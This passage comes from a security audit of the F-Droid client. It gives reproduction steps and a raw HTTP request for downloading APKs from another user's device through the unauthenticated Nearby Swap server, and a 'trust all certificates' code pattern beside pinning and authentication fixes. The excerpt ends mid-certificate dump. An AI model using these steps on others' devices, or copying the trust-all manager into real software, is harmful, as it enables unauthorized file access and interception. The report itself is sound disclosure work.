<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.25</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-025 — (fdroid Client) Snooping in Between Clients in "Nearby Swap"</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-025</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Malicious Use of Feature</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The application's Nearby Swap feature allows a third party to snoop on the communication and download files from either user's device without their permission.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Follow steps below:</div>
<div style="margin-left: 0.2cm; margin-bottom: 5pt; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>1. </div></td><td width="7.56"> </td><td valign="top"><div>Install the app on an Android device.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>2. </div></td><td width="7.56"> </td><td valign="top"><div>Connect to a Wi-Fi network and choose the option Nearby Swap.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>3. </div></td><td width="7.56"> </td><td valign="top"><div>Select any app.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>4. </div></td><td width="7.56"> </td><td valign="top"><div>Now go to any computer on the same Wi-Fi network and scan for local devices with port 8888 open, or simply open the URL shown on the mobile device.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>5. </div></td><td width="7.56"> </td><td valign="top"><div>On the laptop, you will see the fdroid swap default page.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>6. </div></td><td width="7.56"> </td><td valign="top"><div>Now open the URL <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">http://[mobile device IP]:8888/fdroid/repo/icons/</span>. This page will show the list of applications being shared by this device.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>7. </div></td><td width="7.56"> </td><td valign="top"><div>If you want to download an apk file from this device, just modify the URL to <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">http://[mobile device IP]:8888/fdroid/repo/[any_icon_name.apk]</span>.</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">NOTE: In order to do any of this, you don't need any authorization to be given by the mobile app user.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Request to download any apk</span></div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">GET /fdroid/repo/com.amazon.mShop.android_4810.apk HTTP/1.1
User-Agent: F-Droid 1.0.3
Host: 192.168.57.33:8888
Connection: close
Accept-Encoding: gzip, deflate</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Response</span></div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">HTTP/1.1 200 OK
Content-Type: application/vnd.android.package-archive
Date: Tue, 27 Mar 2018 12:36:08 GMT
ETag: bca3baa2
Content-Length: 320880
Accept-Ranges: bytes
Connection: keep-alive
Content-Length: 320880
....
[Redacted]
....</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">It is possible to exploit the Nearby Swap feature of the fdroid application to access the Android device's application directory. This can also be used to download files from the device without any authorization.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">The feature as implemented is exposed to several attacks. The app should not open a web server that every host on the network can access directly; some form of authentication should be required before files are served.</div>
</div>
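<div style="margin-bottom: 5pt; line-height: 6mm;">One way to apply such authentication, as an added example that is not F-Droid's swap server: a minimal local repo server on the JDK's built-in <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">com.sun.net.httpserver</span> that serves <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">/fdroid/repo/</span> only to a peer presenting a per-session token. The token scheme (a fresh random value the device would embed in the URL / QR code it shows) and the class and method names are assumptions for illustration.</div>

```java
import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpServer;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.URI;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;

public class TokenGatedSwapServer {
    static final String REPO_PREFIX = "/fdroid/repo/";
    // Hypothetical design, not F-Droid's: one fresh random token per swap session,
    // embedded in the URL / QR code the device shows, so only that peer can fetch files.
    static final String SESSION_TOKEN = newToken();

    static String newToken() {
        byte[] raw = new byte[16];
        new SecureRandom().nextBytes(raw);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
    }

    /** 200 if allowed, 401 if the token is missing or wrong, 404 for unknown paths; "/" stays public. */
    static int authorize(URI uri, String authHeader, String token) {
        String path = uri.getPath();
        if (!path.startsWith(REPO_PREFIX)) return path.equals("/") ? 200 : 404;
        String presented = "";
        String query = uri.getQuery();                       // accept ?token=... from the shared URL
        if (query != null)
            for (String kv : query.split("&"))
                if (kv.startsWith("token=")) presented = kv.substring("token=".length());
        if (authHeader != null && authHeader.startsWith("Bearer "))   // ...or an Authorization header
            presented = authHeader.substring("Bearer ".length());
        // constant-time comparison: a guessing peer learns nothing from response timing
        byte[] got = presented.getBytes(StandardCharsets.UTF_8), want = token.getBytes(StandardCharsets.UTF_8);
        return MessageDigest.isEqual(got, want) ? 200 : 401;
    }

    public static void main(String[] args) throws Exception {
        HttpServer server = HttpServer.create(new InetSocketAddress("127.0.0.1", 8888), 0);
        server.createContext("/", (HttpExchange ex) -> {
            int status = authorize(ex.getRequestURI(), ex.getRequestHeaders().getFirst("Authorization"), SESSION_TOKEN);
            byte[] body = (status == 200 ? "ok\n" : "denied\n").getBytes(StandardCharsets.UTF_8);
            ex.sendResponseHeaders(status, body.length);
            try (OutputStream out = ex.getResponseBody()) { out.write(body); }
        });
        System.out.println("Share this URL: http://127.0.0.1:8888" + REPO_PREFIX + "?token=" + SESSION_TOKEN);
        server.start();
    }
}
```

<div style="margin-bottom: 5pt; line-height: 6mm;">With this in place, the unauthenticated requests shown above for <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">/fdroid/repo/icons/</span> and any <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">.apk</span> path are answered with 401 instead of the file.</div>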
</div>
<a name="f52--fdroid-client-insecure-implementation-of-ssl"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.26</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-026 — (fdroid Client) Insecure Implementation of SSL</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-026</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Transport Layer Security</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Trusting all certificates, or accepting self-signed certificates, is a critical security hole; it makes this application vulnerable to MITM attacks.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">The application trusts and accepts any SSL certificate, including self-signed ones.
This allows an attacker to route the application's traffic through a proxy and perform MITM attacks.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">The application's code in the file TlsOnlySocketFactory.java shows that it trusts and accepts any SSL certificate.
It is possible to install an SSL certificate on a device and run the application to capture its traffic on the proxy.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">This vulnerability makes the application susceptible to man in the middle attacks.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
A better security practice is to include an SSL certificate inside the application build.
Then check and trust only that certificate at runtime. This is known as SSL pinning.</div>
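<div style="margin-bottom: 5pt; line-height: 6mm;">An added example of the recommended pinning, not F-Droid's TlsOnlySocketFactory: a trust manager that accepts only a server whose public key (SubjectPublicKeyInfo) matches a pinned SHA-256 value, shown next to the "trust everything" manager pattern this finding describes. Pinning the public key rather than the whole certificate is a variant of what the recommendation states; the pin constant is a placeholder and the class name is an assumption.</div>

```java
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import java.util.Base64;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;

public final class PinnedTrustManager implements X509TrustManager {
    // Placeholder pin (32 zero bytes), not a real value: replace with the base64 SHA-256 of the
    // repo server's SubjectPublicKeyInfo, e.g. from
    // openssl x509 -in server.pem -pubkey -noout | openssl pkey -pubin -outform der | openssl dgst -sha256 -binary | base64
    static final String PIN_SHA256_B64 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=";

    // The pattern the finding describes: every server certificate passes unchecked.
    static final X509TrustManager TRUST_ALL = new X509TrustManager() {
        public void checkClientTrusted(X509Certificate[] chain, String authType) { }
        public void checkServerTrusted(X509Certificate[] chain, String authType) { }
        public X509Certificate[] getAcceptedIssuers() { return new X509Certificate[0]; }
    };

    public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        if (chain == null || chain.length == 0) throw new CertificateException("empty certificate chain");
        X509Certificate leaf = chain[0];
        leaf.checkValidity();                                   // still reject expired / not-yet-valid
        try {
            byte[] spkiDigest = MessageDigest.getInstance("SHA-256").digest(leaf.getPublicKey().getEncoded());
            byte[] expected = Base64.getDecoder().decode(PIN_SHA256_B64);
            if (!MessageDigest.isEqual(spkiDigest, expected))    // constant-time compare
                throw new CertificateException("server public key does not match the pinned key");
        } catch (NoSuchAlgorithmException e) {
            throw new CertificateException(e);
        }
    }

    public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        throw new CertificateException("client certificates are not accepted here");
    }

    public X509Certificate[] getAcceptedIssuers() { return new X509Certificate[0]; }

    /** An SSLContext whose only trust decision is the pin above. */
    public static SSLContext pinnedContext() throws Exception {
        SSLContext ctx = SSLContext.getInstance("TLSv1.2");
        ctx.init(null, new TrustManager[] { new PinnedTrustManager() }, null);
        return ctx;
    }
}
```

<div style="margin-bottom: 5pt; line-height: 6mm;">Hostname verification is a separate check and must stay enabled alongside the pin; a proxy's interception certificate fails here because its public key digest does not match.</div>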
</div>
<a name="f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.27</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-027 — (Privilege Extension) Mobile application package signed with weak algorithm `SHA1withRSA`</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-027</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Cryptography</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">SHA1withRSA</span>, which is known to have collision issues, has been used to sign the application package. </div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">SHA1 was used by default in APK signing for a few years. An attacker might be able to create an APK containing their own malicious code
whose SHA1 digest is identical to that of your genuine files. Devices that already have a previous version installed will consider the crafted APK to be signed by your certificate,
and issue no warning when installing it.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Note: if SHA256 is used instead, the app will no longer work on Android devices &lt; 4.3. This means that builds made with the new signing setup will produce APK files that may not install on some Android 4.0-4.2 devices.</div>
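<div style="margin-bottom: 5pt; line-height: 6mm;">An added check that is not part of the audit tooling: a small JDK program that reports which digest an APK's v1 (JAR) signature rests on, and separately the signature algorithm of the signer certificate (the "Signature Algorithm" field in the dump below). The two are often conflated; the manifest digest is what a SHA1 collision on the package contents would have to target. The class name is an assumption, and the program covers only v1 signing, not the v2/v3 APK Signature Scheme.</div>

```java
import java.io.InputStream;
import java.security.cert.Certificate;
import java.security.cert.X509Certificate;
import java.util.jar.Attributes;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;

public class ApkV1SigCheck {
    /** Usage: java ApkV1SigCheck app.apk */
    public static void main(String[] args) throws Exception {
        try (JarFile apk = new JarFile(args[0], true)) {            // true: verify v1 signatures while reading
            // 1. Which digest do the per-file hashes in META-INF/MANIFEST.MF use?
            //    "SHA1-Digest" means the v1 signature rests on SHA-1; newer signers write "SHA-256-Digest".
            Attributes dexAttrs = apk.getManifest().getEntries().get("classes.dex");
            if (dexAttrs == null) { System.out.println("no manifest entry for classes.dex (v1 signature absent?)"); return; }
            System.out.println("manifest digest for classes.dex: SHA-1=" + (dexAttrs.getValue("SHA1-Digest") != null)
                + ", SHA-256=" + (dexAttrs.getValue("SHA-256-Digest") != null));

            // 2. Certificates become available only after the entry has been read and verified.
            JarEntry dex = apk.getJarEntry("classes.dex");
            try (InputStream in = apk.getInputStream(dex)) {
                byte[] buf = new byte[8192];
                while (in.read(buf) != -1) { /* drain; a digest mismatch throws SecurityException here */ }
            }
            Certificate[] certs = dex.getCertificates();
            if (certs == null) { System.out.println("classes.dex is not v1-signed"); return; }
            for (Certificate c : certs) {
                X509Certificate x = (X509Certificate) c;
                System.out.println("signer: " + x.getSubjectX500Principal());
                // How the (self-signed) certificate itself is signed, e.g. SHA1withRSA; distinct from step 1.
                System.out.println("certificate signature algorithm: " + x.getSigAlgName());
            }
        }
    }
}
```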
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Signer Certificate</span></div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">[
[
Version: V3
Subject: CN=Ciaran Gultnieks, OU=Unknown, O=Unknown, L=Wetherby, ST=Unknown, C=UK
Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5
Key:
Validity: [From: Fri Jul 23 22:40:24 IST 2010,
To: Tue Dec 08 22:40:24 IST 2037]
Issuer: CN=Ciaran Gultnieks, OU=Unknown, O=Unknown, L=Wetherby, ST=Unknown, C=UK
SerialNumber: [ 4c49cd00]
]